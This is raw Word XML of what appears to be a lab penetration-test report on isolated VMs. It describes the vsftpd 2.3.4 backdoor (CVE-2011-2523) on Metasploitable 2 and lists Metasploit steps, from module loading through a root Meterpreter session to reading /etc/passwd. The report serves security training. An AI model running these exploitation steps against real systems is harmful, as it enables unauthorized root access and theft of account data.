                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Metasploitable 2</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D47E7EC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Linux Target</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98F399" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.56.103</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8C5E429" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ubuntu 8.04 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="14E63D73"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6E517C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-2</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38F118" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows Server 2019</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F85E089" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows Target</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E03D829" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.56.104</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88886A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Server 2019 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Datacenter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="123F186D"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D030AE" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-3</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0E85D20" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>bWAPP (Bee-Box)</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D496D43" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Web App Target</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4F19EFA" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.56.105</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46C8535" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ubuntu / Apache 2.2.8 / PHP 5.2.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1998BCBB"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745EAD35" w14:textId="77777777" w:rsidTr="00AE6741">
        <w:trPr>
          <w:trHeight w:val="5040"/>
        </w:trPr>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138D0F14" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37EFE120" wp14:editId="0125522B">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="187975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53454" name="Picture 187975345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882E23"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1: Nmap host discovery — all four VMs confirmed active on 192.168.56.0/24 [01_network_scan.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F27C8CE" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="644F7F18" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CBAA16" w14:textId="44DC5DCE" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Exploit 1 — VSFTPD 2.3.4 Backdoor (VM-1: Metasploitable 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1848FD30" w14:textId="19F89330" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.1 Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325E331" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap service enumeration identified port 21/tcp running vsftpd 2.3.4 on 192.168.56.103. This version contains a supply-chain backdoor (CVE-2011-2523) introduced into the official source code in June 2011 [3]. Submitting a username containing </w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>':)'</w:t>
      </w:r>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> during FTP authentication triggers the daemon to spawn a root shell on TCP port 6200, bypassing all authentication entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F89B6F4"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24B97D89"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013C748E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D55B4C2" wp14:editId="54D81833">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="1811629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2948" name="Picture 18116294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7500AC3"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2: Nmap scan — vsftpd 2.3.4 on port 21/tcp confirmed [04_metasploitable_scan.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B11B391" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7122AC1C" w14:textId="7EAB96DF" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.2 Exploitation and Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A319C17" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The Metasploit module exploit/unix/ftp/vsftpd_234_backdoor was loaded with RHOSTS set to 192.168.56.103 and LHOST to 192.168.56.102. Upon execution, a Meterpreter session was opened with root-level privileges — no credentials were required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3E0A2E"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31"/>
        <w:gridCol w:w="4171"/>
        <w:gridCol w:w="4224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="43D1F614" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="46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331948CC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4212"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C0A9BE3" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="434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E0B553D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="4C33CB8D"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8DA2CEA" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</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4F9EA12" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sV</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> --script smb-vuln-ms17-010 192.168.56.103</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957EF1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4 on port 21 identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="4B09E9D2"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14BE8E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</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8DF41BA" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</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7E94506" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit module loaded in Metasploit [11]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="0A200E54"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5BF3D5" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3</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0A6045A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>set RHOSTS 192.168.56.103 / set LHOST 192.168.56.102</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01BF99" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Target and listener configured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="438CE97F"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AD25368" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4</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D67AAC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>exploit</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2CF3AC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Backdoor triggered — Meterpreter session opened</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="1387F42A"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FE68914" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5</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2572E0" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>getuid</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B4AE1A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Server username: root — full access confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="08374FC4"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1AEA521" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6</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401D3D6" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cat /etc/passwd</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5285AFC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>All system accounts exfiltrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CFBB9FD"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1D712872"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701B0A0E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="341B5078" wp14:editId="55D7DA21">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="18905356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35600" name="Picture 189053560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5DB18C"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3: Meterpreter session opened on Metasploitable 2 [05_EXPLOIT1_SUCCESS.png]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19295610"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5AAB8E0B"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61D76393" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027DE19E" wp14:editId="71EE163B">
                  <wp:extent cx="5731510" cy="3223895"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
